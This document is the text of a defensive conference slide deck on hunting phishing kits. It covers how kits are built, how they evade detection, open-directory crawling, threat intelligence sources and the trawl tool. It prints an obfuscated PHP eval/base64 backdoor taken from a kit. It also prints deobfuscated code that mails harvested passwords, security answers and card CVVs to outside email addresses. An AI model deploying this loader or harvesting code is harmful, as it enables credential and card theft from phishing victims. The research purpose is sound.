Hunting Phish Kits

Josh Rickard

Blue Team
DFIR

Automate all the things

Open Sorcerer

@MSAdministrator

I like long walks through binary trees, #Python & #PowerShell riding, holding hands with Microsoft, writing romantic experiences about code, git prune all the branches, and deep sea #phishing

What is a Phish Kit?

Deployable Web App(s)

A set of tools for attackers to deploy a phishing exploit/attempt.

Title Text

backdooring

eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));

Debofuscated Code

$user = $_SESSION['username'];

$pass = $_SESSION['password'];

$q1= $_SESSION['question1'];

$a1 = $_SESSION['answer1'];

$q2 = $_SESSION['question2'];

$a2 = $_SESSION['answer2'];

$q3 = $_SESSION['question3'];

$a3 = $_SESSION['answer3'];

$dob = $_SESSION['dob'];

$exp = $_SESSION['exp'];

$cvv = $_SESSION['cvv'];

if (getenv('HTTP_CLIENT_IP')){

$ip=getenv('HTTP_CLIENT_IP');}

else {

$ip=getenv('REMOTE_ADDR');}

$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);

$browser = $_SERVER['HTTP_USER_AGENT'];

$data = "---------------------bmr---------------------

User: $user

Pass: $pass

Q1 : $q1

A1 : $a1

Q2 : $q2

A2 : $a2

Q3 : $q3

A3 : $a3

dob: $dob

exp: $exp

cvv: $cvv

Browser: $browser

IP: $ip

---------------------BMO---------------------

$un = "multic62@yandex.com";

$do = "sco314159265395.com";

$tr = "fi5319624@gmail.com";

$subj = "Bmer $user#$pass#";

if ($_SESSION['username'] != "" ) {

mail($un,$subj,$data);

mail($do,$subj,$data);

mail($tr,$subj,$data);

}

https://media.pitchfork.com/photos/5d66f433ff912900082415fc/2:1/w_790/TeeJay6.png

img/

reduce network communications with the original / cloned site

```
increase backwards compatibility
```

And typical confirmation pages for websites require specific images to replicate the users expected experience.

htaccess

Blocking entire CIDR blocks or specific IPs
Redirecting based on user-agent string used

robots.txt

Disallow access to specific directories
Sometimes also used to block specific user-agent strings

Title Text

antibots.php

card validation

logs!

Warez Kits

Lots of goodies found here

PowerShell
EXEs
MSIs
DLLs
BINs
PDFs
DOCXs
LNKs
APKs

BENIES

ioc's are not dead

IOC's are still valuable for active defense but TTPs are better for long-term defensive measures

PhishKit Names & Versions
Email Addresses being used to forward captured content
Logs
Specific hosting providers
- WHOIS/RDAP info
Additionally, if you continue to see a phishkit variant over and over you can track their defensive measures - this also helps to improve your own tooling

catchin kitz

simplified phishing response workflow

pre-filtered sources

OpenPhish.com
PhishTank.com
https://github.com/mitchellkrogza/Phishing.Database
UrlScan.io
Twitter!

raw sources

Certificate Transparency Logs - https://certstream.calidog.io
WHOIS Domain Search - https://whoisds.com/
Dumpster Fire - https://pastebin.com/
WebAnalyzer (WHOIS new Domains) - https://wa-com.com
FireHOL IP Blocklists - http://iplists.firehol.org/

#opendir || opendir

#phishkit || phishkit

#phishingkit ||phishingkit

#opendir

/some[.]domain[.]com/phish/path

some.domain[.com//phish//path

hxxps://some.domain[.]com/phish/path

hXXp://some.domain.com/

http://some.domain.com/

finding & generating paths

Identify the root of the site
Download content
Check if title of page contains "Index Of"
1. Parse all <a> & <href> tags for files and folders
2. Add files to file list (add to master list)
3. Add folders to original URL path (add to master list)
4. Repeat
Each folder in path (path list) is parsed and a .zip is appended
1. Add to master list
Attempt to download all files (based on extension preference) in master list
Profit?

Title Text

open-source tools

https://github.com/swimlane/trawl

kthxbye

twitter: @MSAdministrator

github: https://github.com/MSAdministrator

p-blog: https://letsautomate.it

w-blog: https://swimlane.com/blog

trawl: https://github.com/swimlane/trawl

slides: https://letsautomate.it/presentations/hunting-for-phishkits.html#/

(slides will be up sometime this week/end)